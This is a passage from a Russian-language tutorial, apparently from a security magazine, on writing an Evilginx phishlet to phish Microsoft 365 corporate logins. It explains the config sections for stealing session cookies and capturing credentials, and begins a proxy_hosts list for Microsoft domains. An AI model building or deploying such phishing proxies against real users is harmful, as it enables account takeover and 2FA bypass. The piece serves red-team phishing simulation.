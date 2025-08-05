Ког­да мне в ходе рабоче­го про­екта понадо­билось фишить кор­поратив­ные поч­ты, я стол­кнул­ся с отсутс­тви­ем руководс­тва по соз­данию фиш­лета для Evilginx, а готовые как раз перес­тали работать из‑за изме­нений на сай­те. Я решил, что это отличная воз­можность научить­ся раз­рабаты­вать свой фиш­лет. Нашей целью будет Microsoft 365.

info Под­робное руководс­тво о том, как раз­вернуть связ­ку из Evilginx и Gophish, читай в статье «Evilginx + Gophish. Под­нима­ем инфраструк­туру для симуля­ции фишин­га с обхо­дом 2FA».

Для соз­дания фиш­лета нам понадо­бят­ся толь­ко две вещи:

бра­узер (мой выбор пал на Firefox) или ути­лита, которая спо­соб­на логиро­вать зап­росы и отве­ты из бра­узе­ра (Burp Suite);

тек­сто­вый редак­тор для написа­ния кода.

Все фиш­леты Evilginx хра­нят­ся в дирек­тории ути­литы, в пап­ке phishlets . Если они в тво­ей вер­сии где‑то в дру­гом мес­те, то прос­то запус­ти Evilginx и при­нуди­тель­но ука­жи ему дирек­торию с фиш­летами: -p / phishlets_folder .

Преж­де чем соз­давать свой фиш­лет, я бы хотел разоб­рать его струк­туру и под­робнее рас­ска­зать про каж­дую из час­тей. Для начала пос­мотрим на дефол­тный фиш­лет, который лежит в дирек­тории phishlets ути­литы Evilginx на GitHub. На его осно­ве мы раз­берем, за что отве­чает каж­дая из час­тей фиш­лета, а более деталь­ный ана­лиз про­ведем на осно­ве фиш­лета для сай­та login. microsoftonline. com .

# Версия min_ver : ' 3. 0. 0' # Раздел, указывающий на субдомены, которые будут проксироваться proxy_hosts : - { phish_sub : ' academy' , orig_sub : ' academy' , domain : ' breakdev. org' , session : true , is_landing : true , auto_filter : true } # Раздел с правилами, которые позволят избежать нежелательных редиректов или изменить содержимое фишингового сайта, как тебе надо sub_filters : - { triggers_on : ' breakdev. org' , orig_sub : ' academy' , domain : ' breakdev. org' , search : ' something_to_look_for' , replace : ' replace_it_with_this' , mimes : [ ' text/ html' ] } # Раздел, указывающий, какие куки будут «сворованы» auth_tokens : - domain : ' . academy. breakdev. org' keys : [ ' cookie_name' ] # Раздел, указывающий, какие данные будут получены из запросов credentials : username : key : ' email' search : ' (. *) ' type : ' post' password : key : ' password' search : ' (. *) ' type : ' post' # Легитимная страница авторизации на сайте login : domain : ' academy. breakdev. org' path : ' / evilginx-mastery'

В дефол­тном фиш­лете не ука­заны такие раз­делы, как auth_urls и js_inject , но их мы пока отло­жим. В начале опи­сания каж­дого модуля фиш­лета я для наг­ляднос­ти буду встав­лять кусок кода, а даль­ше в ходе повес­тво­вания показы­вать скрин­шоты. Ну что, нач­нем?

min_ver

Это пер­вая часть фиш­лета, с которой ты будешь стал­кивать­ся каж­дый раз. Эта стро­ка отве­чает за то, с какой имен­но вер­сии ути­литы будет работать фиш­лет (я пред­почитаю ука­зывать 3.0.0, одна­ко видел, что, некото­рые соз­датели фиш­летов ука­зыва­ют 2.3.0).

proxy_hosts

В этом раз­деле опи­саны все под­домены и домены, которые будет обра­баты­вать Evilginx. Их тра­фик будет прок­сировать­ся через нашу ути­литу. Это важ­ный раз­дел: если не вклю­чить в спи­сок ни один сайт, то чейн нарушит­ся и во вре­мя выпол­нения цепоч­ки зап­росов слу­чит­ся переход на легитим­ный сайт.

При­мер кода proxy_hosts :

proxy_hosts : - { phish_sub : " login" , orig_sub : " login" , domain : " microsoftonline. com" , session : true , is_landing : true , auto_filter : false } - { phish_sub : " www" , orig_sub : " www" , domain : " office. com" , session : true , is_landing : false , auto_filter : false } - { phish_sub : " login1" , orig_sub : " login" , domain : " live. com" , session : true , is_landing : false , auto_filter : false } - { phish_sub : " account" , orig_sub : " account" , domain : " live. com" , session : true , is_landing : false , auto_filter : false } - { phish_sub : " outlook" , orig_sub : " outlook" , domain : " live. com" , session : true , is_landing : false } - { phish_sub : ' ' , orig_sub : ' ' , domain : ' office. com' , session : true , is_landing : false , auto_filter : true }

Ты, воз­можно, спро­сишь, что зна­чат парамет­ры session , is_landing и auto_filter . Что ж, непони­мание в работе с Evilginx иног­да губитель­но, так что рас­ска­жу!